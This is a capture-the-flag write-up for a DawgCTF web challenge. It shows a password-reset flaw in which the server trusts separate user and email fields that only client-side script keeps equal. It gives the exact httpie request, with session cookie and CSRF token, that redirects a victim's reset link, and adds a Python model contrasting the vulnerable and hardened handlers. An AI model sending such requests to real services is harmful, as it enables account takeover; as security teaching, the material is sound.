
>Let's steal someone's account.
http://freewifi.ctf.umbccd.io/

We get the same PCAP for download.

As in the first part, the capture shows an access to /staff.html, but the codes posted there are invalid this time.

Given the hint (*steal someone's account*), the interesting part of the capture is the POST to /forgotpassword.html.

Looking at the form, we notice that the username and the e-mail address the recovery link is sent to are the same value, submitted twice in two different fields (user and email). A small JS function on the page takes care of copying one into the other:

<script type="text/javascript">
{
// Runs when the forgot-password form is submitted: the hidden "user" field
// is overwritten with whatever was typed into "email", so a normal browser
// submission always sends the same value in both fields. The coupling only
// exists in this script; a request that bypasses it can send two different values.
document.getElementsByClassName('form')[0].onsubmit = function() {
    var email = document.getElementById('email')
    var user = document.getElementById('user')
    user.value = email.value
}
}
</script>

This is, of course, exploitable: the server selects the account from the user field and the recipient from the email field, and nothing on the server side checks that they match. So we can request a reset for the user we already know (true.grit@umbccd.io) and have the link delivered to an e-mail address we control.

So we just access /forgotpassword.html, note the session cookie and the CSRF token (the token is tied to the session cookie, so both must come from the same response) and send a malicious request with different values in the two fields:

http --print HBhb --form https://freewifi.ctf.umbccd.io/forgotpassword.html "Cookie: session=eyJjc3JmX3Rva2VuIjoiMjJkM2Y3MDcwMmRlODE1MGQ2MmIxNWY0OGYxZGE0NTk2NDFlNjUwZiJ9.XpGTcA.rFWe8NOuN2d2sHRGvyNvdezd5o4" user=true.grit@umbccd.io email=truegrit@mailinator.com 'csrf_token=IjIyZDNmNzA3MDJkZTgxNTBkNjJiMTVmNDhmMWRhNDU5NjQxZTY1MGYi.XpGTcA.u7DSvZ-sNEJvL3a7MUT03l-z3WY' submit=Submit

We get the flag right away in the response; there is no need to access the mailbox:

Flag: **DawgCTF{cl!3nt_s1d3_v@l!d@t!0n_1s_d@ng3r0u5}**
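To make the root cause concrete, here is an added example (not part of the original write-up, and not the challenge's own server code) that replays the steps above offline: it extracts the CSRF token from a constructed stand-in for the forgotpassword.html page, builds the attacker's form body with mismatched user and email fields, and feeds it to two toy server models, one that mails the link to the posted email field (the behaviour exploited here) and one that looks the recipient up from the account record. The page markup, the token value, the account table and the handler functions are all assumptions for illustration.

```python
"""Added example (not part of the original write-up, and not the challenge's
own server code): model the forgotpassword.html flow offline and contrast
the client-side coupling with a server-side fix."""
import re
import secrets
from typing import Optional
from urllib.parse import urlencode

# Constructed stand-in for the /forgotpassword.html response. The field
# names (user, email, csrf_token, submit) are those seen in the captured
# POST; the surrounding markup and the token value are assumed.
SAMPLE_PAGE = """
<form class="form" method="post">
  <input type="hidden" name="csrf_token" value="IjIyZDNm.example.token">
  <label>E-mail <input type="text" id="email" name="email"></label>
  <input type="hidden" id="user" name="user" value="">
  <input type="submit" name="submit" value="Submit">
</form>
"""

CSRF_RE = re.compile(r'name="csrf_token"\s+value="([^"]+)"')


def extract_csrf_token(html: str) -> Optional[str]:
    """Pull the hidden CSRF token out of the form page (step 1 of the attack)."""
    match = CSRF_RE.search(html)
    return match.group(1) if match else None


def build_reset_form(csrf_token: str, victim_user: str, attacker_email: str) -> dict:
    """Build the form body an attacker posts directly. In a browser the
    onsubmit handler would overwrite 'user' with the e-mail address; a
    direct POST skips that script, so the two fields can differ."""
    return {
        "user": victim_user,
        "email": attacker_email,
        "csrf_token": csrf_token,
        "submit": "Submit",
    }


# Constructed account table: username -> registered recovery address.
ACCOUNTS = {"true.grit@umbccd.io": "true.grit@umbccd.io"}


def vulnerable_forgot_password(form: dict) -> Optional[dict]:
    """Behaviour the write-up exploits: the account is chosen from 'user'
    and the reset link is mailed to whatever 'email' says. Returns the mail
    that would be sent (recipient and token), or None if no mail is sent."""
    user = form.get("user")
    if user not in ACCOUNTS:
        return None
    token = secrets.token_urlsafe(16)  # would be stored against the account
    return {"to": form.get("email"), "token": token}


def hardened_forgot_password(form: dict) -> Optional[dict]:
    """Fix: the recipient is looked up from the account record and the
    posted 'email' field is ignored entirely. The HTTP response shown to the
    caller should be identical whether or not the account exists, so the
    endpoint does not double as a username oracle."""
    user = form.get("user")
    if user not in ACCOUNTS:
        return None
    token = secrets.token_urlsafe(16)
    return {"to": ACCOUNTS[user], "token": token}


def run_attack(page: str = SAMPLE_PAGE) -> dict:
    """Replay the write-up's steps against both server models."""
    token = extract_csrf_token(page)
    form = build_reset_form(token, "true.grit@umbccd.io", "truegrit@mailinator.com")
    vulnerable = vulnerable_forgot_password(form)
    hardened = hardened_forgot_password(form)
    return {
        "body": urlencode(form),
        "vulnerable_sends_to": vulnerable["to"] if vulnerable else None,
        "hardened_sends_to": hardened["to"] if hardened else None,
    }


if __name__ == "__main__":
    for key, value in run_attack().items():
        print(f"{key}: {value}")
```

The hardened handler makes the point of the flag explicit: anything a browser script enforces is advisory, and the recovery address has to come from data the server already holds, never from the request. Returning the same response for known and unknown usernames is a separate but related hardening that the toy model notes in its docstring.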